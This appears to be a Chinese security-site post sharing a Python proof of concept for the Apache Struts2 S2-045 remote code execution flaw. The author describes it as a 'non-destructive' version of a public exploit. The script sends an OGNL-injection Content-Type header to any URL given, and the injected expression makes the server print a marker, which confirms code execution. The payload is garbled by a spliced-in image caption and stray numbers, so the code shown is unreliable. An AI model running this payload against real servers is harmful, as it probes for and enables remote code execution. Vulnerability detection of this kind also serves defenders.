s2-045 无损检测 PoC 分享

07.7W+0
华盟原创文章投稿奖励计划
这次的POC由网上公开的EXP修改而来,主要是由于该EXP具有一定的攻击性,所以我们做了一个无损检测的修改,。
附上无损检测POC:
#! /usr/bin/env python
#coding: utf-8
import requests
import sys
header = dict()
header[‘Content-Type’] = “%{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)图片[2]-s2-045 无损检测 PoC 分享-华盟网(#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println(‘test’ 602 53718)).(#o.close())}”
s = requests.get(sys.argv[1], headers=header)
print s.content
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
最新漏洞
# s2-045,无损检测,PoC
喜欢就支持一下吧
点赞0 分享
congtou的头像-华盟网
S时评:奥巴马时代的网络安全-华盟网
S时评:奥巴马时代的网络安全
S时评:奥巴马时代的网络安全
10年前 188W+
华盟学院山东省第二期线下学习计划-华盟网
华盟学院山东省第二期线下学习计划
华盟学院山东省第二期线下学习计划
8年前 85.8W+
我混IT这么久,什么“山寨货”没见过?-华盟网
我混IT这么久,什么“山寨货”没见过?
我混IT这么久,什么“山寨货”没见过?
8年前 83.9W+
停课不停学| 华盟学院&重生信安高阶特训营为你保驾护航-华盟网
停课不停学| 华盟学院&重生信安高阶特训营为你保驾护航
停课不停学| 华盟学院&重生信安高阶特训营为你保驾护航
6年前 49.4W+
BlackHat 2018 | 10大网络安全热点趋势-华盟网
BlackHat 2018 | 10大网络安全热点趋势
BlackHat 2018 | 10大网络安全热点趋势
8年前 49.2W+
万达电商亚洲首个超级账本“黑客马拉松”在沪开赛-华盟网
万达电商亚洲首个超级账本“黑客马拉松”在沪开赛
万达电商亚洲首个超级账本“黑客马拉松”在沪开赛
9年前 40.3W+
相关推荐
入侵监控设备最新漏洞附Poc工具【厉害了】-华盟网
入侵监控设备最新漏洞附Poc工具【厉害了】
入侵监控设备最新漏洞附Poc工具【厉害了】
8年前 13.9W+
CVE-2017-0199:Microsoft Office RTF 漏洞利用 PoC-华盟网
CVE-2017-0199:Microsoft Office RTF 漏洞利用 PoC
CVE-2017-0199:Microsoft Office RTF 漏洞利用 PoC
9年前 11.9W+
Struts 2 远程代码执行漏洞(s2-045\s2-046) (含PoC)-华盟网
Struts 2 远程代码执行漏洞(s2-045\s2-046) (含PoC)
Struts 2 远程代码执行漏洞(s2-045\s2-046) (含PoC)
9年前 11.7W+
fastjson远程代码执行漏洞技术分析与防护方案-华盟网
fastjson远程代码执行漏洞技术分析与防护方案
fastjson远程代码执行漏洞技术分析与防护方案
9年前 11.7W+
【注意】RouterOS 重要漏洞-华盟网
【注意】RouterOS 重要漏洞
【注意】RouterOS 重要漏洞
8年前 11.2W+
Java AMF3曝远程代码执行漏洞-华盟网
Java AMF3曝远程代码执行漏洞
Java AMF3曝远程代码执行漏洞
9年前 10.6W+
评论 抢沙发

请登录后发表评论

    暂无评论内容